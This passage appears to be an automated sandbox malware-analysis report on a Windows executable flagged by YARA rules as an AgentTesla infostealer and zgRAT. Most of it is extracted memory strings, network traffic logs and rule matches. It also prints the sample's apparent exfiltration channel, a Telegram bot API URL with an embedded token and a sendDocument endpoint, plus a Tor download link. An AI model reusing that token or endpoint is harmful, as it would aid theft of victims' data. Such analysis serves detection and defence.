Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: rzN2ckYW24.exe, 00000000.00000003.271274480.0000000005C88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersS
Source: rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.264972803.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comF
Source: rzN2ckYW24.exe, 00000000.00000003.271274480.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.304989135.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.272003113.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.271826229.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.coma
Source: rzN2ckYW24.exe, 00000000.00000003.266665020.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comals
Source: rzN2ckYW24.exe, 00000000.00000003.265034269.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comcomF
Source: rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comcomp
Source: rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comd
Source: rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comitum
Source: rzN2ckYW24.exe, 00000000.00000003.271826229.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comm
Source: rzN2ckYW24.exe, 00000000.00000003.271274480.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.304989135.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.272003113.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.271826229.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.commTTF
Source: rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comp
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: rzN2ckYW24.exe, 00000000.00000003.259617773.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cB
Source: rzN2ckYW24.exe, 00000000.00000003.259617773.0000000005C87000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259464865.0000000005C87000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259543069.0000000005C88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: rzN2ckYW24.exe, 00000000.00000003.259617773.0000000005C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cns-ea
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: rzN2ckYW24.exe, 00000000.00000002.304989135.0000000005C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmp
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: rzN2ckYW24.exe, 00000000.00000003.261577709.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: rzN2ckYW24.exe, 00000000.00000003.262479660.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.262420491.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp//ra
Source: rzN2ckYW24.exe, 00000000.00000003.262479660.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.262420491.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: rzN2ckYW24.exe, 00000000.00000003.261577709.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/a-d
Source: rzN2ckYW24.exe, 00000000.00000003.262479660.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.262420491.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261577709.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/b
Source: rzN2ckYW24.exe, 00000000.00000003.261577709.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/dz
Source: rzN2ckYW24.exe, 00000000.00000003.262479660.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.262420491.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: rzN2ckYW24.exe, 00000000.00000003.261392765.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: rzN2ckYW24.exe, 00000000.00000003.258445715.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257102086.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259940209.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259819475.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259520848.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257053691.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258806192.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261728305.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260344832.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257296101.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260291295.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261561559.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258343538.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260210658.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261692319.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257200608.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258935636.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261197728.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257254857.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258324367.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261444840.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.coma
Source: rzN2ckYW24.exe, 00000000.00000003.258445715.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257102086.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259940209.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259819475.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259520848.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257053691.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258806192.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261728305.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260344832.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257296101.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260291295.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261561559.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258343538.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260210658.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261692319.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257200608.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258935636.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261197728.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257254857.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258324367.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261444840.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.comiv
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: rzN2ckYW24.exe, 00000000.00000003.262413128.0000000005CB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.comrm
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgappdatajVuurjVuur.exe/http://TMVuQQ.com
Source: rzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/
Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/5596534279%discordapi%yyy
Source: rzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/sendDocument
Source: rzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org4Tkh
Source: rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

DNS traffic detected: queries for: api.ipify.org

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49703 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 2.0.rzN2ckYW24.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 2.0.rzN2ckYW24.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.rzN2ckYW24.exe.2cd4898.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 0.2.rzN2ckYW24.exe.2cf7984.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 0.2.rzN2ckYW24.exe.3e099c8.12.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.rzN2ckYW24.exe.3e099c8.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.rzN2ckYW24.exe.2d587f0.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: rzN2ckYW24.exe PID: 3044, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: rzN2ckYW24.exe PID: 6128, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown

.NET source code contains very large array initializations

Source: 2.0.rzN2ckYW24.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b87A8F58Cu002dE7E8u002d43ADu002d9293u002dD820C15D240Cu007d/ED869E5Fu002dF8FEu002d4A77u002dA1BBu002dFA143876B5CC.cs

Large array initialization: .cctor: array initializer size 10986

Source: rzN2ckYW24.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 2.0.rzN2ckYW24.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 2.0.rzN2ckYW24.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.rzN2ckYW24.exe.2cd4898.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 0.2.rzN2ckYW24.exe.2cf7984.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 0.2.rzN2ckYW24.exe.3e099c8.12.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.rzN2ckYW24.exe.3e099c8.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.rzN2ckYW24.exe.2d587f0.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: rzN2ckYW24.exe PID: 3044, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: rzN2ckYW24.exe PID: 6128, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20

Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Code function: 0_2_02B3E390	0_2_02B3E390
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Code function: 0_2_02B3E38A	0_2_02B3E38A
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Code function: 0_2_02B3C41C	0_2_02B3C41C
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Code function: 0_2_075F18D8	0_2_075F18D8
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Code function: 0_2_075F18E8	0_2_075F18E8
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Code function: 2_2_00E8FA60	2_2_00E8FA60
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Code function: 2_2_00E80227	2_2_00E80227
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Code function: 2_2_00E86C60	2_2_00E86C60
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Code function: 2_2_05C4C638	2_2_05C4C638
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Code function: 2_2_05C429F8	2_2_05C429F8
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Code function: 2_2_05C40910	2_2_05C40910
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Code function: 2_2_05C4D398	2_2_05C4D398
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Code function: 2_2_05C40040	2_2_05C40040
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Code function: 2_2_06529408	2_2_06529408

Source: rzN2ckYW24.exe, 00000000.00000000.253186404.0000000000A66000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVAZlQ.exe, vs rzN2ckYW24.exe
